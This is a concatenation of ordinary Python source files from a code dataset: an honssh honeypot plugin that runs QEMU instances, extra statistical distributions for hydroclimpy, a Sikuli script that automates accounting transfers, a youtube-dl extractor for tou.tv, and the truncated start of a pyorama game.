STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGE.\n\nfrom os import environ\nfrom copy import deepcopy\nfrom random import randint\nfrom twisted.internet import reactor, defer\nfrom twisted.internet.protocol import ProcessProtocol\nfrom honssh.config import Config\nfrom honssh.utils import validation\nfrom honssh.log import msg\nfrom honssh import spoof, log\n\n\nclass QemuProcessProtocol(ProcessProtocol):\n def __init__(self, qid):\n self.qid = qid\n def done(self, reason):\n msg(log.LGREEN, '[QEMU][PROCESS]', 'Qemu instance <%d> finished. Result: <%s>' %\n (self.qid, reason))\n def childDataReceived(self, childFD, data):\n if data[-1:] == '\\n':\n data = data[:-1]\n if childFD == 1:\n msg(log.PLAIN, '[QEMU][PROCESS]', 'Qemu instance <%d> stdout: <%s>' %\n (self.qid, str(data)))\n elif childFD == 2:\n msg(log.LRED, '[QEMU][PROCESS]', 'Qemu instance <%d> stderr: <%s>' %\n (self.qid, str(data)))\n def errReceived(self, data):\n msg(log.LRED, '[QEMU][PROCESS]', 'Qemu instance <%d> ERROR: <%s>' %\n (self.qid, str(data)))\n def processEnded(self, reason):\n ecode = reason.value.exitCode\n if ecode is not None:\n msg(log.LPURPLE if ecode == 0 else log.LRED,\n '[QEMU][PROCESS]', 'Qemu instance <%d> exited with <%d>' %\n (self.qid, ecode))\n else:\n msg(log.LPURPLE, '[QEMU][PROCESS]', 'Qemu instance <%d> exited' % (self.qid))\n\nclass Qemu(object):\n started = False\n proc = None\n EXEC = 'qemu-system-i386'\n IMAG = 'buildroot/bzImage'\n VNCS = 8\n BIND = '127.0.0.1'\n PORT = 22223\n MEMO = 64\n CORS = 1\n ARGS = ['-enable-kvm','-cpu','host','-m','{MEMO:d}','-smp','{CORS:d}','-net',\n 'nic,model=virtio',\n '-net','user,hostfwd=tcp:{BIND:s}:{PORT:d}-:22','-kernel','{IMAG:s}',\n '-vnc','127.0.0.1:{VNCS:d}']\n allowed_attrs = ['EXEC','IMAG','VNCS',\n 'BIND','PORT','MEMO',\n 'CORS','ARGS']\n\n def __init__(self, qid):\n self.qid = qid\n self.PORT += qid\n self.VNCS += qid\n\n def set_qemu_details(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.allowed_attrs:\n setattr(self, key, value)\n else:\n raise AttributeError('Key <%s> from kwargs not allowed!' %\n (key))\n\n def get_qemu_details(self):\n outdict = {}\n for key in self.allowed_attrs:\n outdict[key] = getattr(self, key)\n return outdict\n\n def start(self):\n arglist = self.build_qemu_args(self.EXEC)\n msg(log.LPURPLE, '[QEMU]', 'Starting instance <%d>: <%s>' %\n (self.qid, self.EXEC))\n msg(log.LPURPLE, '[QEMU]', 'Args for instance <%d>: <%s>' %\n (self.qid, ' '.join(arglist)))\n self.proc = reactor.spawnProcess(\n QemuProcessProtocol(self.qid), self.EXEC, [self.EXEC] + arglist,\n environ, usePTY=False,\n childFDs={1:'r',2:'r'}\n )\n self.started = True\n\n def stop(self):\n self.proc.signalProcess('KILL')\n self.started = False\n\n def build_qemu_args(self, arg0):\n outargs = []\n kwargs = self.get_qemu_details()\n for arg in self.ARGS:\n outargs.append(arg.format(**kwargs))\n return outargs\n\nclass Peer(object):\n qemu = None\n count = 0\n\n def __init__(self, qemu):\n self.qemu = qemu\n\nclass QemuManager(object):\n _instance = None\n _qemus = []\n _peers = {}\n _plock = defer.DeferredLock()\n\n @classmethod\n def getInstance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance\n\n def __init__(self):\n self._qemu_max_instances = 4\n for i in range(self._qemu_max_instances):\n self._qemus.append(Qemu(i))\n reactor.addSystemEventTrigger('before', 'shutdown', self.stopAll)\n\n def start(self, qid):\n return self._qemus[qid].start()\n\n def startAll(self):\n for qemu in self._qemus:\n qemu.start()\n\n def _allStoppedCallback(self):\n msg(log.LYELLOW, '[QEMU][Shutdown]', 'Waiting for all instances to terminate ..')\n for qemu in self._qemus:\n if qemu.proc.pid is not None:\n d = defer.Deferred()\n reactor.callLater(1, d.callback, None)\n return d\n else:\n qemu.proc.loseConnection()\n return None\n\n def stop(self, qid):\n return self._qemus[qid].stop()\n\n def stopAll(self):\n for qemu in self._qemus:\n qemu.proc.signalProcess('KILL')\n return self._allStoppedCallback()\n\n def availableInstance(self, peer_ip):\n if peer_ip not in self._peers:\n inst = self._qemus[randint(0, len(self._qemus)-1)]\n while inst.started is False:\n inst = self._qemus[randint(0, len(self._qemus)-1)]\n self._peers[peer_ip] = Peer(inst)\n else:\n inst = self._peers[peer_ip].qemu\n return (inst.BIND, inst.PORT)\n\n def acquireInstance(self, peer_ip):\n inst = self._peers[peer_ip].qemu\n self._peers[peer_ip].count += 1\n msg(log.LYELLOW, '[QEMU]', 'Acquired instance <%d> for <%s> #<%d>' %\n (inst.qid, peer_ip, self._peers[peer_ip].count))\n\n def releaseInstance(self, peer_ip, login_succeeded):\n if peer_ip in self._peers:\n inst = self._peers[peer_ip].qemu\n if login_succeeded is True:\n self._peers[peer_ip].count -= 1\n if self._peers[peer_ip].count == 0:\n del self._peers[peer_ip]\n\nclass Plugin(object):\n def __init__(self):\n self.cfg = Config.getInstance()\n self.qemu = QemuManager.getInstance()\n self.connection_timeout = self.cfg.getint(['honeypot', 'connection_timeout'])\n self.login_succeeded = False\n\n def get_pre_auth_details(self, conn_details):\n details = self.get_connection_details(conn_details)\n return details\n\n def get_post_auth_details(self, conn_details):\n success, username, password = spoof.get_connection_details(conn_details)\n if success:\n details = self.get_connection_details(conn_details)\n details['username'] = username\n details['password'] = password\n else:\n details = {'success': False}\n return details\n\n def login_successful(self):\n self.qemu.acquireInstance(self.peer_ip)\n self.login_succeeded = True\n\n def connection_lost(self, conn_details):\n self.qemu.releaseInstance(self.peer_ip, self.login_succeeded)\n\n def start_server(self):\n self.qemu.startAll()\n\n def get_connection_details(self, conn_details):\n honey_ip, honey_port = self.qemu.availableInstance(conn_details['peer_ip'])\n self.peer_ip = conn_details['peer_ip']\n return {'success': True, 'sensor_name': 'Qemu', 'honey_ip': honey_ip, 'honey_port': honey_port,\n 'connection_timeout': self.connection_timeout}\n\n def validate_config(self):\n section = 'honeypot-static-qemu'\n props = [[section, 'enabled'], [section, 'pre-auth'], [section, 'post-auth']]\n for prop in props:\n if not self.cfg.check_exist(prop, validation.check_valid_boolean):\n return False\n\n Qemu.EXEC = self.cfg.get([section, 'exec'], Qemu.EXEC)\n Qemu.IMAG = self.cfg.get([section, 'image'], Qemu.IMAG)\n Qemu.VNCS = self.cfg.getint([section, 'vnc-start'], Qemu.VNCS)\n Qemu.PORT = self.cfg.getint([section, 'ssh-start'], Qemu.PORT)\n Qemu.MEMO = self.cfg.getint([section, 'memory'], Qemu.MEMO)\n Qemu.CORS = self.cfg.getint([section, 'cpus'], Qemu.CORS)\n\n return True\n","sub_path":"honssh/honeypot/honeypot-static-qemu.py","file_name":"honeypot-static-qemu.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"20524298","text":"\"\"\"\n.. currentmodule:: scikits.hydroclimpy.stats.extradistributions\n\n\nConventions\n===========\n\n* :math:`F` is the cumulative distribution function (CDF).\n* :math:`f` is the probability distribution function (PDF).\n* :math:`x = \\cfrac{x - \\\\xi}{\\\\alpha}` is a reduced variable,\n where :math:`\\\\xi` is a location parameter and :math:`\\\\alpha` is a scale\n parameter.\n\n\nGeneralized normal\n==================\n\nThe generalized normal distribution is defined by its cumulative distribution:\n\n.. math::\n F(x) = \\Phi{\\left[ -k^{-1} \\log\\{1 - kx\\} \\\\right]}\n\nwhere :math:`\\Phi` is the normal CDF.\n\n* When :math:`k=0`, this expression reduces to the standard normal distribution\n with location parameter :math:`\\\\xi` and scale parameter :math:`\\\\alpha`.\n\n\n\nGeneralized logistic\n====================\n\nThe generalized logistic is defined by its CDF:\n\n.. math::\n F(x;k) = \\\\frac{1}{1 + \\left[1 - kx\\\\right]^{1/k}}\n\nwhere :math:`k` is a shape parameter.\n\n.. The PDF is given by :math:`f(x) = `\nThe PPF is given by :math:`x = k^{-1} [1 - \\{(1 - F)/F\\}^{k}]`.\n\n\n\nKappa\n=====\n\nThe Kappa distribution is defined by its CDF:\n\n.. math::\n F(x; a, b) = \\left[1-h\\{1-kx\\}^{1/k}\\\\right]^{1/h}\n\nwhere :math:`k` and :math:`h` are two scale parameters.\n\nThe PPF is given by :math:`x = k^{-1} [1 - \\{(1 - F)^{h}/h\\}^{k}]`\n\n\n\nWakeby\n======\n\nThe Wakeby distribution is defined by the transformation:\n\n.. math::\n \\cfrac{x - \\\\xi}{\\\\alpha} = \\\\frac{1}{\\\\beta} \\left[1 - (1-U)^{\\\\beta}\\\\right] -\n \\\\frac{\\gamma}{\\delta} \\left[1 - (1-U)^{-\\delta} \\\\right]\n\nwhere :math:`U` is a standard uniform random variable, and where\n:math:`\\\\beta`, :math:`\\gamma` and :math:`\\delta` are three shape parameters.\nThat is, the above equation defines the percent point function for the Wakeby \ndistribution.\n\nThe cumulative distribution function is computed by numerically inverting\nthe percent point function.\nThe probability density function is then found by using the following relation\n(given on page 46 of Johnson, Kotz, and Balakrishnan):\n\n.. math::\n f(x) = \\cfrac{[1 - F(x)]^{\\delta+1}}{%\n \\\\alpha [1 - F(x)]^{\\\\beta+\\delta} + \\gamma}\n\nThe parameters :math:`\\\\beta`, :math:`\\gamma` and :math:`\\delta` are shape\nparameters; :math:`\\\\xi` is a location parameter and :math:`\\\\alpha` a scale\nparameter.\nWith three shape parameters, the Wakeby distrbution can model a wide variety\nof shapes.\n\nThe following restrictions apply to the parameters of this distribution:\n\n* :math:`\\\\delta < 1.`\n* :math:`\\\\beta + \\delta \\geq 0`\n* either :math:`\\\\beta + \\delta > 0` or :math:`\\\\beta = \\gamma = \\delta = 0`\n* :math:`\\gamma \\geq 0`. If :math:`\\gamma > 0`, then :math:`\\delta > 0`\n* :math:`\\\\alpha + \\gamma \\geq 0`.\n\nThe domain of the Wakeby distribution is \n:math:`[\\\\xi ; +\\inf)` for :math:`\\delta \\geq 0` and :math:`\\gamma > 0` and\n:math:`[\\\\xi ; \\\\xi + \\\\alpha (1/\\\\beta - \\gamma/\\delta))`\nfor :math:`\\delta < 0` or :math:`\\gamma = 0`.\n\n\n\nNotes about adding distributions to :mod:`scipy.stats.distributions`.\n=====================================================================\n\nIn scipy, a distribution (`distrib`) is implemented as a generic class \n(`distrib_gen`) which is a subclass of either :class:`rv_continuous` or\n:class:`rv_distrib`.\nThis `distrib_gen` class is a catch-all to define the basic methods, such\nas :meth:`_pdf`, :meth:`_cdf` or :math:`_ppf`.\n\n\nAttributes\n----------\n\n.. attribute:: a\n\n The lower bound of the validity domain.\n If the lower bound is independent of the input parameters, it can be set\n when creating a new instance of the distribution.\n If the lower bound depends on the parameters, it can be set\n with the :meth:`_argcheck` method.\n\n\n.. attribute:: b\n\n The upper bound of the validity domain.\n If the lower bound is independent of the input parameters, it can be set\n when creating a new instance of the distribution.\n If the lower bound depends on the parameters, it can be set\n with the :meth:`_argcheck` method.\n\n\nMethods\n-------\n\n.. method:: _argcheck\n\n Check the validity of the extra scale parameters.\n By default, the parameters must be strictly positive.\n If this is not the case, a generic condition ``(k==k)`` can be used instead.\n\n\n\"\"\"\n\n\nimport numpy as np\nfrom numpy import exp, floor, log, power, sqrt, where\nimport numpy.random as mtrand\n\nimport scipy.special as special\nimport scipy.optimize as optimize\nimport scipy.stats.distributions as dist\nfrom scipy.stats.distributions import argsreduce, valarray\n\nimport _lmoments\n\narr = np.asarray\n\n__all__ = ['gennorm_gen', 'gennorm', 'glogistic_gen', 'glogistic',\n 'kappa_gen', 'kappa',\n 'logseries_gen', 'logseries',\n 'pearson3_gen', 'pearson3',\n 'wakeby_gen', 'wakeby',\n 'ztnbinom_gen', 'ztnbinom']\n\n\n##--- Continuous distributions -------------------------------------------------\n\nclass kappa_gen(dist.rv_continuous):\n \"\"\"\n The CDF is given by \n\n.. math::\n F(x; a, b) = \\left[1-h\\{1-kx\\}^{1/k}\\\\right]^{1/h}\n \"\"\"\n def _argcheck(self, k, h):\n k = np.asarray(k)\n h = np.asarray(h)\n # Upper bound\n self.b = where(k <= 0, np.inf, 1. / k)\n # Lower bound\n self.a = where(h > 0,\n where(k == 0, 0., (1 - h ** (-k)) / k),\n where(k < 0, 1. / k, -np.inf))\n return (k == k) | (h == h)\n\n def _cdf(self, x, k, h):\n y = where(k == 0, exp(-x), (1 - k * x) ** (1. / k))\n return where(h == 0, exp(-y), (1. - h * y) ** (1. / h))\n def _pdf(self, x, k, h):\n y = (1 - k * x) ** (1. / k - 1.)\n y *= self._cdf(x, k, h) ** (1. - h)\n return y\n def _ppf(self, q, k, h):\n y = where(h == 0, -log(q), (1. - q ** h) / h)\n y = where(k == 0, -log(y), (1. - y ** k) / k)\n return y\n\nkappa = kappa_gen(name='kappa', shapes='k,h', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass glogistic_gen(dist.rv_continuous):\n \"\"\"\nThe CDF is given by\n\n.. math::\n F(x;k) = \\\\frac{1}{1 + \\left[1 - kx\\\\right]^{1/k}}\n \"\"\"\n #\n numargs = 1\n #\n def _argcheck(self, k):\n return (k == k)\n def _cdf(self, x, k):\n u = where(k == 0, exp(-x), (1. - k * x) ** (1. / k))\n return 1. / (1. + u)\n def _pdf(self, x, k):\n u = where(k == 0, exp(-x), (1. - k * x) ** (1. / k))\n return u ** (1. - k) / (1. + u) ** 2\n def _ppf(self, q, k):\n F = q / (1. - q)\n return where(k == 0, log(F), (1 - F ** (-k)) / k)\n\nglogistic = glogistic_gen(name='glogistic', shapes='k', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass gennorm_gen(dist.rv_continuous):\n \"\"\"\n The CDF is given by \n\n.. math::\n F(x) = \\Phi{\\left[ -k^{-1} \\log\\{1 - kx\\} \\\\right]}\n \"\"\"\n #\n numargs = 1\n #\n def _argcheck(self, k):\n return (k == k)\n #\n def _cdf(self, x, k):\n y = where(k == 0, x, -np.log(1. - k * x) / k)\n return 0.5 * (1 + special.erf(y * np.sqrt(0.5)))\n #\n def _pdf(self, x, k):\n u = where(k == 0, x, -log(1. - k * x) / k)\n return exp(k * u - u * u / 2.) / np.sqrt(2 * np.pi)\n #\n def _ppf(self, q, k):\n u = dist._norm_ppf(q)\n return where(k == 0, u, (1. - exp(-k * u)) / k)\n\ngennorm = gennorm_gen(name='gennorm', shapes='k', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass wakeby_gen(dist.rv_continuous):\n \"\"\"\nThe Wakeby distribution is defined by the transformation:\n(x-xi)/a = (1/b).[1 - (1-U)^b] - (c/d).[1 - (1-U)^(-d)]\n\n \"\"\"\n #\n def _argcheck(self, b, c, d):\n b = np.asarray(b)\n c = np.asarray(c)\n d = np.asarray(d)\n check = where(b + d > 0,\n where(c == 0, d == 0, True),\n (b == c) & (c == d) & (d == 0))\n np.putmask(check, c > 0, d > 0)\n np.putmask(check, c < 0, False)\n return check\n #\n def _ppf(self, q, b, c, d):\n z = -np.log(1. - q)\n u = where(b == 0, z, (1. - exp(-b * z)) / b)\n v = where(d == 0, z, (1. - exp(d * z)) / d)\n return u - c * v\n #\n def _cdf(self, x, b, c, d):\n if hasattr(x, '__iter__'):\n cdf = np.array([_lmoments.cdfwak(_, parameters)\n for (_, parameters) in zip(x, zip(b, c, d))])\n else:\n cdf = _lmoments.cdfwak(x, (b, c, d))\n return cdf\n #\n def _pdf(self, x, b, c, d):\n t = (1. - self._cdf(x, b, c, d))\n f = t ** (d + 1) / (t ** (b + d) + c)\n return f\n\n\nwakeby = wakeby_gen(name='wakeby', shapes='beta, gamma, delta', extradoc=\"\"\"\n\n\"\"\")\n\n\n\nclass pearson3_gen(dist.gamma_gen):\n \"\"\"\nThe Pearson III is a particular case of the Gamma distribution.\n\n \"\"\"\n #\n def _fix_loc_scale(self, args, mu, scale=1):\n N = len(args)\n # Get mu and scale (sigma) from args\n if N == 2 and mu is None:\n mu = args[-1]\n elif N == 3 and scale is None:\n (mu, scale) = args[-2:]\n gamma = args[0]\n # Set the default\n if scale is None:\n scale = 1.\n if mu is None:\n mu = 0.0\n # Transforms (gamma, mu, sigma) into (alpha, xi, beta)\n sigma = scale\n if gamma == 0:\n return ((0.,), mu, sigma)\n xi = mu - 2 * sigma / gamma\n beta = sigma * abs(gamma) / 2.\n beta = sigma * gamma / 2.\n alpha = 4. / gamma ** 2.\n # Returns the resul: the first argument must be a tuple\n return ((alpha,), xi, beta)\n\n\n def pdf(self, x, *args, **kwds):\n \"\"\"\n Probability density function at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n pdf : array-like\n Probability density function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n scale = np.abs(scale)\n # \n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (x > self.a) & (x < self.b)\n valid = ispe3 & indom\n #\n output = np.zeros(np.shape(valid), 'd')\n np.putmask(output, (1 - ispe3) * np.array(indom, bool), self.badvalue)\n (x, shape, scale) = argsreduce(valid, *((x, shape, scale,)))\n np.place(output, (valid & isgamma), self._pdf(x, shape) / scale)\n np.place(output, (valid & isnorm), dist._norm_pdf(x) / scale)\n if output.ndim == 0:\n return output[()]\n return output\n\n def cdf(self, x, *args, **kwds):\n \"\"\"\n Cumulative distribution function at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n cdf : array-like\n Cumulative distribution function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n # \n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isnorm | isgamma)\n indomain = (x > self.a) & (x < self.b)\n toolarge = (x >= self.b)\n valid = ispe3 & indomain\n output = np.zeros(np.shape(valid), 'd')\n np.place(output, (1 - ispe3) * (indomain == indomain), self.badvalue)\n np.place(output, toolarge, 1.0)\n if any(valid): #call only if at least 1 entry\n (x, shape) = argsreduce(valid, *((x,) + (shape,)))\n vals = self._cdf(x, shape)\n np.place(output, (valid & isgamma),\n np.where(scale > 0, vals, 1. - vals))\n np.place(output, (valid & isnorm), dist._norm_cdf(x))\n if output.ndim == 0:\n return output[()]\n return output\n\n\n def sf(self, x, *args, **kwds):\n \"\"\"\n Survival function (1-cdf) at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n sf : array-like\n Survival function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (x > self.a) & (x < self.b)\n toosmall = ispe3 & (x <= self.a)\n valid = ispe3 & indom\n output = np.zeros(np.shape(valid), 'd')\n np.place(output, (1 - ispe3) * (indom == indom), self.badvalue)\n np.place(output, toosmall, 1.0)\n (x, shape) = argsreduce(valid, *((x, shape,)))\n vals = self._sf(x, shape)\n np.place(output, (valid & isgamma), np.where(scale > 0, vals, 1. - vals))\n np.place(output, (valid & isnorm), 1. - dist._norm_cdf(x))\n if output.ndim == 0:\n return output[()]\n return output\n\n def ppf(self, q, *args, **kwds):\n \"\"\"\n Percent point function (inverse of cdf) at q of the given RV.\n\n Parameters\n ----------\n q : array-like\n lower tail probability\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n x : array-like\n quantile corresponding to the lower tail probability q.\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (q, loc, scale, shape) = map(arr, (q, loc, scale, args[0]))\n q = np.where(scale > 0, q, 1. - q)\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (q > 0) & (q < 1)\n islarge = (q == 1) & ispe3\n valid = ispe3 & indom\n output = valarray(np.shape(valid), value=self.a * np.abs(scale) + loc)\n np.place(output, (1 - ispe3) + (1 - indom) * (q != 0.0), self.badvalue)\n np.place(output, islarge, self.b * np.abs(scale) + loc)\n if any(valid): #call only if at least 1 entry\n (q, shape, scale, loc) = argsreduce(valid, *((q, shape, scale, loc)))\n np.place(output, (valid & isgamma), self._ppf(q, shape) * scale + loc)\n np.place(output, (valid & isnorm), dist._norm_ppf(q) * scale + loc)\n if output.ndim == 0:\n return output[()]\n return output\n\n def isf(self, q, *args, **kwds):\n \"\"\"\n Inverse survival function at q of the given RV.\n\n Parameters\n ----------\n q : array-like\n upper tail probability\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n x : array-like\n quantile corresponding to the upper tail probability q.\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (q, loc, scale, shape) = map(arr, (q, loc, scale, args[0]))\n q = np.where(scale > 0, q, 1. - q)\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (q > 0) & (q < 1)\n islarge = (q == 1) & ispe3\n valid = ispe3 & indom\n output = valarray(np.shape(valid), value=self.b)\n #place(output,(1-cond0)*(cond1==cond1), self.badvalue)\n np.place(output, (1 - ispe3) * (indom == indom) + (1 - indom) * (q != 0.0),\n self.badvalue)\n np.place(output, islarge, self.a)\n if np.any(valid): #call only if at least 1 entry\n goodargs = argsreduce(valid, *((q,) + args + (scale, loc))) #PB replace 1-q by q\n (q, shape, scale, loc) = argsreduce(valid, *((q, shape, scale, loc)))\n np.place(output, (valid & isgamma), self._isf(q, shape) * scale + loc)\n np.place(output, (valid & isnorm), -dist._norm_ppf(q))\n if output.ndim == 0:\n return output[()]\n return output\n\npearson3 = pearson3_gen(name='Pearson III', shapes='gamma', extradoc=\"\"\"\n\n\"\"\")\n\n\n\n##--- Discrete distributions ---------------------------------------------------\n\n\n# Negative binomial\nclass ztnbinom_gen(dist.rv_discrete):\n def _rvs(self, n, pr):\n return mtrand.negative_binomial(n, pr, self._size)\n def _argcheck(self, n, pr):\n return (n >= 0) & (pr >= 0) & (pr <= 1)\n def _pmf(self, x, n, pr):\n coeff = exp(special.gammaln(n + x) - special.gammaln(x + 1) - special.gammaln(n))\n return coeff * power(pr, n) * power(1 - pr, x) / (1 - power(pr, n))\n def _cdf(self, x, n, pr):\n k = floor(x)\n vals = (special.betainc(n, k + 1, pr) - special.betainc(n, 1, pr))\n return vals / (1. - pr ** n)\n def _sf_skip(self, x, n, pr):\n #skip because special.nbdtrc doesn't work for 0= 1.\n\"\"\"\n )\n\n\n\nclass logseries_gen(dist.rv_discrete):\n def _argcheck(self, pr):\n return (pr > 0) & (pr < 1)\n def _pmf(self, x, pr):\n a = -1. / log(1. - pr)\n return a * pr ** x / x\n def _stats(self, p):\n a = -1. / log(1. - p)\n mu = a * p / (1. - p)\n var = mu * (1. / (1. - p) - mu)\n ap = a * p\n g1 = (1 + p - 3 * ap + 2 * ap * ap) / sqrt(ap * (1 - ap) ** 3)\n g2 = (1 + 4 * p + p ** 2 - 4 * ap * (1 + p) + (6 - 3 * ap) * ap * ap) / (ap * (1 - ap) ** 2)\n return (mu, var, g1, g2)\n def fit(self, distrib):\n (mu, var) = (distrib.mean(), distrib.var())\n pr_0 = 1. - mu / (mu * mu + var)\n def mle(pr, x):\n F = x * np.log(pr) - np.log(x) - np.log(-np.log(1. - pr))\n return - np.sum(F, axis=0)\n return optimize.fmin(mle, pr_0, args=(distrib.ravel(),), disp=0)\nlogseries = logseries_gen(a=1, name='logseries', shapes=\"pr\", extradoc=\"\"\"\n\nLog-series distribution\n\n logseries.pmf(k,p) = -1/log(1-p) * p**k / k\n for k in {1,...,n}\n\"\"\")\n\n\n\n\n\n","sub_path":"scikits/hydroclimpy/stats/extradistributions.py","file_name":"extradistributions.py","file_ext":"py","file_size_in_byte":20739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"569901903","text":"from sikuli import *\nimport logging\nimport myTools\n\n#---------------------------------------------------#\ndef fCreate_OneFundsTransfer(pClient,pCliNum,pMonth):\n#---------------------------------------------------#\n\n logging.debug('- Create_OneFundsTransfer: ' + str(pMonth) + \"-\" + pClient)\n\n # new transaction\n type(\"n\",KeyModifier.CTRL)\n myTools.waitForTransEntry()\n\n # switch to Transfer to Funds\n\n type(Key.UP) # this is to get by a UI defect\n time.sleep(1) \n type(\"t\")\n time.sleep(1)\n type(Key.DOWN)\n time.sleep(1) \n type(Key.TAB)\n \n # client\n myTools.enterClient(pClient)\n \n # date\n tranDate = str(pMonth) + \"/28/\" + Settings.dataYear\n type(tranDate)\n time.sleep(1)\n type(Key.TAB) \n \n # Amount\n type(Key.TAB)\n \n # Description\n type(\"a\",KeyModifier.CTRL)\n type(pClient + \" - \" + str(pCliNum) + \" - \" + tranDate)\n type(Key.ENTER)\n time.sleep(1)\n type(Key.TAB)\n\n # payment list - mark first item in list\n if (int(Settings.tsVersion) > 2016) and (Settings.tsDB == \"PREM\"):\n type(Key.SPACE) # in TS2017+ PREM, this marks the check box\n else: \n type(Key.DOWN) # in others, this movement highlights first in list\n \n time.sleep(1)\n type(Key.TAB)\n\n # funds account\n type(Key.END)\n time.sleep(1)\n\n type(\"s\",KeyModifier.CTRL)\n myTools.waitForTransSave() \n\n#---------------------------------------------------#\ndef fCreate_TransfersToFunds(pMonth):\n#---------------------------------------------------#\n\n myTools.sectionStartTimeStamp(\"transfer funds\" + str(pMonth))\n logging.debug('Create_TransfersFunds: ' + str(pMonth))\n\n allClients = [\"East.Brookfield\",\"North.Andover\",\"West.Bridgewater\"]\n count = 0\n\n myTools.getFocus()\n\n # open a/r tran list\n type(\"t\",KeyModifier.CTRL)\n myTools.waitForTransList()\n\n for oneClient in allClients:\n count += 1\n fCreate_OneFundsTransfer(oneClient,count,pMonth)\n\n type(Key.F4,KeyModifier.CTRL)\n time.sleep(1)\n type(Key.F4,KeyModifier.CTRL)\n \n myTools.sectionEndTimeStamp()\n myTools.checkProcesses()","sub_path":"trans_TransfersToFunds.sikuli/trans_TransfersToFunds.py","file_name":"trans_TransfersToFunds.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"102426905","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..utils import int_or_none\n\n\nclass TouTvIE(InfoExtractor):\n IE_NAME = 'tou.tv'\n _VALID_URL = r'https?://ici\\.tou\\.tv/(?P[a-zA-Z0-9_-]+/S[0-9]+E[0-9]+)'\n\n _TEST = {\n 'url': 'http://ici.tou.tv/garfield-tout-court/S2015E17',\n 'info_dict': {\n 'id': '122017',\n 'ext': 'mp4',\n 'title': 'Saison 2015 Épisode 17',\n 'description': 'La photo de famille 2',\n 'upload_date': '20100717',\n },\n 'params': {\n # m3u8 download\n 'skip_download': True,\n },\n }\n\n def _real_extract(self, url):\n path = self._match_id(url)\n metadata = self._download_json('http://ici.tou.tv/presentation/%s' % path, path)\n video_id = metadata['IdMedia']\n details = metadata['Details']\n title = details['OriginalTitle']\n\n return {\n '_type': 'url_transparent',\n 'url': 'radiocanada:%s:%s' % (metadata.get('AppCode', 'toutv'), video_id),\n 'id': video_id,\n 'title': title,\n 'thumbnail': details.get('ImageUrl'),\n 'duration': int_or_none(details.get('LengthInSeconds')),\n }\n","sub_path":"python/youtube-dl/2016/8/toutv.py","file_name":"toutv.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10320446","text":"from pyorama.core.app import *\r\nfrom pyorama.graphics.window import *\r\nfrom pyorama.event.listener import *\r\nfrom pyorama.event.event_enums import *\r\n\r\nclass Game(App):\r\n \r\n def init(self):\r\n super().init()\r\n self.setup_window()\r\n \r\n def quit(self):\r\n super().quit()\r\n\r\n def setup_window(self):\r\n self.width = 800\r\n self.height = 600\r\n self.window = 